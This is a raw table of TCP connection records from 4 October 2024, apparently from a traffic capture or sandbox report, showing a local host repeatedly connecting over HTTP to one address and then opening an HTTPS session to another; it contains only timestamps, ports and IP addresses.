Oct 4, 2024 19:17:32.743736982 CEST	80	49737	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:32.743839025 CEST	49737	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:32.743839025 CEST	49737	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:32.746597052 CEST	49738	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:32.748874903 CEST	80	49737	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:32.751677036 CEST	80	49738	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:32.751825094 CEST	49738	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:32.751941919 CEST	49738	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:32.751979113 CEST	49738	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:32.756823063 CEST	80	49738	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:32.756916046 CEST	80	49738	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:34.012309074 CEST	80	49738	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:34.012593031 CEST	80	49738	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:34.015007019 CEST	49738	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:34.015053988 CEST	49738	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:34.017842054 CEST	49739	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:34.020073891 CEST	80	49738	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:34.023808956 CEST	80	49739	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:34.023900032 CEST	49739	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:34.024044991 CEST	49739	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:34.024066925 CEST	49739	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:34.028985977 CEST	80	49739	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:34.029449940 CEST	80	49739	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:35.661429882 CEST	80	49739	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:35.661689997 CEST	80	49739	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:35.661778927 CEST	49739	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:35.661921978 CEST	49739	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:35.665900946 CEST	49740	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:35.666724920 CEST	80	49739	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:35.670844078 CEST	80	49740	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:35.670914888 CEST	49740	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:35.671066046 CEST	49740	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:35.671091080 CEST	49740	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:35.676795959 CEST	80	49740	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:35.677556038 CEST	80	49740	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:37.176362038 CEST	80	49740	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:37.176422119 CEST	80	49740	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:37.176451921 CEST	80	49740	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:37.176772118 CEST	49740	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:37.177001953 CEST	49740	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:37.179985046 CEST	49741	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:37.181937933 CEST	80	49740	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:37.184988022 CEST	80	49741	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:37.185075998 CEST	49741	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:37.185187101 CEST	49741	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:37.185203075 CEST	49741	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:37.190222979 CEST	80	49741	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:37.190357924 CEST	80	49741	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:38.460279942 CEST	80	49741	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:38.460949898 CEST	80	49741	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:38.461102962 CEST	49741	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:38.461102962 CEST	49741	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:38.463537931 CEST	49742	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:38.466090918 CEST	80	49741	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:38.468429089 CEST	80	49742	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:38.468492985 CEST	49742	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:38.468645096 CEST	49742	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:38.468666077 CEST	49742	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:38.473472118 CEST	80	49742	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:38.473797083 CEST	80	49742	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:39.742799044 CEST	80	49742	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:39.742933989 CEST	80	49742	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:39.742990017 CEST	49742	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:39.743033886 CEST	49742	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:39.746087074 CEST	49743	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:39.748049974 CEST	80	49742	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:39.751303911 CEST	80	49743	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:39.751406908 CEST	49743	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:39.751497030 CEST	49743	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:39.751589060 CEST	49743	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:39.756555080 CEST	80	49743	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:39.756645918 CEST	80	49743	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:41.935817957 CEST	80	49743	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:41.935889959 CEST	80	49743	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:41.935899973 CEST	80	49743	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:41.936054945 CEST	49743	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:41.936752081 CEST	80	49743	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:41.936784983 CEST	49743	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:41.936805010 CEST	49743	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:41.937155008 CEST	80	49743	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:41.937195063 CEST	49743	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:41.938338995 CEST	49744	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:41.941816092 CEST	80	49743	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:41.943413973 CEST	80	49744	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:41.943496943 CEST	49744	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:41.943613052 CEST	49744	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:41.943629980 CEST	49744	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:41.948708057 CEST	80	49744	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:41.948743105 CEST	80	49744	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:43.234663963 CEST	80	49744	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:43.234875917 CEST	80	49744	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:43.234931946 CEST	49744	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:43.234968901 CEST	49744	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:43.237822056 CEST	49745	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:43.241780043 CEST	80	49744	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:43.247590065 CEST	80	49745	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:43.247646093 CEST	49745	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:43.247756958 CEST	49745	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:43.247783899 CEST	49745	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:43.252576113 CEST	80	49745	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:43.252751112 CEST	80	49745	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:44.532157898 CEST	80	49745	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:44.532228947 CEST	80	49745	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:44.532366037 CEST	49745	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:44.532413006 CEST	49745	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:44.534626961 CEST	49746	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:44.537230015 CEST	80	49745	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:44.539506912 CEST	80	49746	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:44.539566994 CEST	49746	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:44.539654970 CEST	49746	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:44.539668083 CEST	49746	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:44.544436932 CEST	80	49746	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:44.544590950 CEST	80	49746	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:46.020754099 CEST	80	49746	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:46.021090984 CEST	80	49746	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:46.021152973 CEST	49746	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:46.021322966 CEST	49746	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:46.025629997 CEST	49747	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:46.026355028 CEST	80	49746	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:46.030805111 CEST	80	49747	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:46.030878067 CEST	49747	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:46.031004906 CEST	49747	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:46.031042099 CEST	49747	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:46.035873890 CEST	80	49747	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:46.035883904 CEST	80	49747	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:47.326775074 CEST	80	49747	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:47.327414036 CEST	80	49747	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:47.327482939 CEST	49747	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:47.327533960 CEST	49747	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:47.329880953 CEST	49748	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:47.332463980 CEST	80	49747	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:47.334695101 CEST	80	49748	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:47.334758997 CEST	49748	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:47.334846973 CEST	49748	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:47.334862947 CEST	49748	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:47.339668989 CEST	80	49748	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:47.339989901 CEST	80	49748	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:48.977094889 CEST	80	49748	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:48.977304935 CEST	80	49748	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:48.977509022 CEST	49748	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:48.979948044 CEST	49748	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:48.988157034 CEST	80	49748	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:49.174053907 CEST	49749	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:49.180334091 CEST	80	49749	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:49.180411100 CEST	49749	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:49.184708118 CEST	49749	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:49.184753895 CEST	49749	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:49.190361023 CEST	80	49749	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:49.191344023 CEST	80	49749	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:50.436805964 CEST	80	49749	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:50.436965942 CEST	80	49749	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:50.437179089 CEST	49749	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:50.437268019 CEST	49749	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:50.440129042 CEST	49750	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:50.442117929 CEST	80	49749	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:50.445066929 CEST	80	49750	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:50.445144892 CEST	49750	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:50.445280075 CEST	49750	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:50.445280075 CEST	49750	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:50.450193882 CEST	80	49750	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:50.450225115 CEST	80	49750	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:51.851650953 CEST	80	49750	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:51.852175951 CEST	80	49750	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:51.852257013 CEST	49750	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:51.852345943 CEST	49750	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:51.854979038 CEST	49751	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:51.857382059 CEST	80	49750	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:51.860229969 CEST	80	49751	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:51.860297918 CEST	49751	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:51.860373974 CEST	49751	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:51.860398054 CEST	49751	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:51.865545988 CEST	80	49751	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:51.865576982 CEST	80	49751	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:53.124948025 CEST	80	49751	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:53.125155926 CEST	80	49751	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:53.125210047 CEST	49751	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:53.125241041 CEST	49751	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:53.128654957 CEST	49752	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:53.130142927 CEST	80	49751	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:53.133938074 CEST	80	49752	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:53.134046078 CEST	49752	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:53.134146929 CEST	49752	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:53.134146929 CEST	49752	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:53.138964891 CEST	80	49752	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:53.139332056 CEST	80	49752	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:54.706336021 CEST	80	49752	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:54.706670046 CEST	80	49752	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:54.706816912 CEST	49752	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:54.706816912 CEST	49752	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:54.709500074 CEST	49753	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:54.713357925 CEST	80	49752	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:54.715966940 CEST	80	49753	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:54.716056108 CEST	49753	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:54.716171980 CEST	49753	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:54.716207981 CEST	49753	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:54.721365929 CEST	80	49753	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:54.721395016 CEST	80	49753	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:55.980564117 CEST	80	49753	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:55.980838060 CEST	80	49753	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:55.981021881 CEST	49753	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:55.981021881 CEST	49753	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:55.983423948 CEST	49754	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:55.986166000 CEST	80	49753	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:55.988776922 CEST	80	49754	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:55.988857031 CEST	49754	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:55.989092112 CEST	49754	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:55.989126921 CEST	49754	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:55.994267941 CEST	80	49754	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:55.994298935 CEST	80	49754	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:57.269402981 CEST	80	49754	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:57.270010948 CEST	80	49754	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:57.270101070 CEST	49754	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:57.270184994 CEST	49754	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:57.272176981 CEST	49756	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:57.275223970 CEST	80	49754	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:57.277146101 CEST	80	49756	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:57.277218103 CEST	49756	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:57.277337074 CEST	49756	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:57.277393103 CEST	49756	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:57.282468081 CEST	80	49756	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:57.282499075 CEST	80	49756	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:58.561872959 CEST	80	49756	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:58.562470913 CEST	80	49756	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:58.562665939 CEST	49756	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:58.562666893 CEST	49756	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:58.567559958 CEST	80	49756	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:58.671758890 CEST	49758	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:58.676729918 CEST	80	49758	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:58.676819086 CEST	49758	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:58.677289963 CEST	49758	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:58.677308083 CEST	49758	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:58.682271004 CEST	80	49758	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:58.682614088 CEST	80	49758	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:59.955315113 CEST	80	49758	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:59.955872059 CEST	80	49758	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:59.955930948 CEST	49758	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:59.955996990 CEST	49758	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:59.958348036 CEST	49764	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:59.960915089 CEST	80	49758	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:59.963229895 CEST	80	49764	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:59.963304043 CEST	49764	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:59.963534117 CEST	49764	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:59.963534117 CEST	49764	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:17:59.968513966 CEST	80	49764	177.129.90.106	192.168.2.4
Oct 4, 2024 19:17:59.968573093 CEST	80	49764	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:01.348764896 CEST	80	49764	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:01.349019051 CEST	80	49764	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:01.349075079 CEST	49764	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:01.349108934 CEST	49764	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:01.354088068 CEST	80	49764	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:01.358963966 CEST	49771	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:01.363863945 CEST	80	49771	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:01.363933086 CEST	49771	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:01.364276886 CEST	49771	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:01.364296913 CEST	49771	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:01.369263887 CEST	80	49771	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:01.369348049 CEST	80	49771	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:02.656132936 CEST	80	49771	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:02.656718016 CEST	80	49771	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:02.656821966 CEST	49771	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:02.656821966 CEST	49771	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:02.658967018 CEST	49781	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:02.661689997 CEST	80	49771	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:02.663861990 CEST	80	49781	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:02.663929939 CEST	49781	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:02.664063931 CEST	49781	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:02.664100885 CEST	49781	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:02.669081926 CEST	80	49781	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:02.669662952 CEST	80	49781	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:04.039516926 CEST	80	49781	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:04.047652006 CEST	80	49781	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:04.047722101 CEST	49781	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:04.050882101 CEST	49781	80	192.168.2.4	177.129.90.106
Oct 4, 2024 19:18:04.056324005 CEST	80	49781	177.129.90.106	192.168.2.4
Oct 4, 2024 19:18:04.062362909 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:04.062422037 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.062483072 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:04.062792063 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:04.062808990 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.684990883 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.685086012 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:04.686558962 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:04.686573029 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.686803102 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.694694042 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:04.735404968 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.908590078 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.908668041 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.908756971 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:04.908823013 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.960608006 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:04.998656988 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.998671055 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.998872042 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:04.999317884 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.999325037 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.999402046 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:04.999964952 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:04.999974012 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.000036955 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.000345945 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.000416994 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.089319944 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.089453936 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.089504004 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.089586020 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.090107918 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.090194941 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.090640068 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.090708017 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.091459990 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.091526985 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.091640949 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.091711044 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.092508078 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.092577934 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.172810078 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.173000097 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.185559988 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.185712099 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.185731888 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.185758114 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.185789108 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.185807943 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.185926914 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.185993910 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.186470032 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.186536074 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.187107086 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.187166929 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.187335014 CEST	443	49792	23.145.40.164	192.168.2.4
Oct 4, 2024 19:18:05.187418938 CEST	49792	443	192.168.2.4	23.145.40.164
Oct 4, 2024 19:18:05.187602043 CEST	443	49792	23.145.40.164	192.168.2.4
